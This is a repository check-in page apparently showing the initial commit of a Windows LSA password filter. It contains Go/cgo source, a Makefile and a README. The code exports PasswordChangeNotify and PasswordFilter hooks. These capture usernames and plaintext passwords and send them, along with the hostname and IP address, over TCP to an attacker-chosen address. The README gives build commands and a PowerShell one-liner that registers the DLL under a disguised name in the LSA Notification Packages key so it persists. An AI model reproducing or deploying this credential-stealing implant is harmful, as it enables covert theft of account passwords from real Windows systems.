Windows Password Filter

⌈⌋ ⎇ branch:  win-pass-filter


Check-in [f2dea56b19]

Many hyperlinks are disabled.
Use anonymous login to enable hyperlinks.

Overview
Comment:Initial Commit
Downloads: Tarball | ZIP archive | SQL archive
Timelines: family | ancestors | descendants | both | trunk
Files: files | file ages | folders
SHA3-256: f2dea56b197fa698723910bfec765806ce9c55c61cedf24ad7a0124be9ce3f3c
User & Date: brimstone 2019-06-07 00:51:53
Context
2019-06-07
01:02
Update README to look prettier check-in: c1da28af1e user: brimstone tags: trunk
00:51
Initial Commit check-in: f2dea56b19 user: brimstone tags: trunk
00:20
initial empty check-in check-in: f37bd2c91b user: brimstone tags: trunk
Changes
Hide Diffs Unified Diffs Ignore Whitespace Patch

Added .fossil-settings/ignore-glob. 





>

1

/filter.h

Added Makefile. 























>
>
>
>
>
>
>
>
>
>

1
2
3
4
5
6
7
8
9
10

.PHONY: filter.dll
filter.dll:
	rm -f filter.dll
	GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared
	x86_64-w64-mingw32-objdump -p filter.dll | grep InitializeChangeNotify
	x86_64-w64-mingw32-objdump -p filter.dll | awk '/Ordinal\/Name Pointer/,/^$$/'

.PHONY: clean
clean:
	rm -f filter.h filter.o filter.dll

Added README.md. 

































































>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

win-pass-filter
===============

_stolen from https://github.com/iDigitalFlame/redteam-tools_

This is a windows LSA password filter that sends the new password to an IP of
your choosing.

Build
-----

Simply build for windows with CGO enabled and the appropriate receiver listing
port.
```
GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags 'main.remote=192.168.0.100:4444'
```


Install
-------

Copy the `filter.dll` to somewhere like `c:\windows\system32\idk.dll` and
install with powershell
```
powershell -com "$a='idk';$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`n$a"""
```

If you change the name of the dll in `c:\windows\system32` then also update the
`$a` variable.

Reboot when finished.

Added extra.go. 















































>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

package main

/*
#include <windows.h>
#include <ntsecapi.h>

CRITICAL_SECTION cs;

__declspec(dllexport) BOOL NTAPI InitializeChangeNotify(void) { return TRUE; }

__declspec(dllexport) NTSTATUS NTAPI PasswordChangeNotify(PUNICODE_STRING UserName, ULONG RelativeId, PUNICODE_STRING NewPassword) {
    EnterCriticalSection(&cs);
    HaGotEm(UserName->Length, (char*)(UserName->Buffer), NewPassword->Length, (char*)(NewPassword->Buffer));
    LeaveCriticalSection(&cs);
    return 0;
}
__declspec(dllexport) BOOL NTAPI PasswordFilter(PUNICODE_STRING AccountName, PUNICODE_STRING FullName, PUNICODE_STRING Password, BOOL SetOperation) {
    HaGotEm(AccountName->Length, (char*)(AccountName->Buffer), Password->Length, (char*)(Password->Buffer));
    return TRUE;
}
*/
import "C"

Added filter.go. 

































































































































































>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

package main

////// #cgo LDFLAGS: -lwinmm
import "C"

import (
	"fmt"
	"net"
	"os"
	"time"
)

func getIPAddress() string {
	i, err := net.Interfaces()
	if err != nil {
		return "<nil>"
	}
	for _, a := range i {
		if a.Flags&net.FlagUp == 0 || a.Flags&net.FlagLoopback != 0 {
			continue
		}
		if n, err := a.Addrs(); err == nil {
			for _, ad := range n {
				var r net.IP
				switch ad.(type) {
				case *net.IPNet:
					r = ad.(*net.IPNet).IP
				case *net.IPAddr:
					r = ad.(*net.IPAddr).IP
				default:
					continue
				}
				if r.IsLoopback() || r.IsUnspecified() || r.IsMulticast() || r.IsInterfaceLocalMulticast() || r.IsLinkLocalMulticast() || r.IsLinkLocalUnicast() {
					continue
				}
				if p := r.To4(); p != nil {
					return p.String()
				}
				return r.String()
			}
		} else {
			return "<nil>"
		}
	}
	return "<nil>"
}

var remote = "127.0.0.1:4444"

//export HaGotEm
func HaGotEm(l C.int, u *C.char, n C.int, p *C.char) C.int {
	a := []byte(C.GoStringN(u, l))
	y := []byte(C.GoStringN(p, n))
	e := make([]rune, l/2)
	k := make([]rune, n/2)
	for i := 0; i < len(a); i += 2 {
		e[i/2] = rune(a[i])
	}
	for i := 0; i < len(y); i += 2 {
		k[i/2] = rune(y[i])
	}
	h, err := os.Hostname()
	if err != nil {
		h = ""
	}
	x, err := net.DialTimeout("tcp", remote, time.Duration(5*time.Second))
	if err != nil {
		return C.int(-1)
	}
	defer x.Close()
	d := []byte(fmt.Sprintf("[%s:(%s)%s:%s]\n", h, getIPAddress(), string(e), string(k)))
	if _, err := x.Write(d); err != nil {
		return C.int(-1)
	}
	x.Close()
	return C.int(0)
}

func main() {}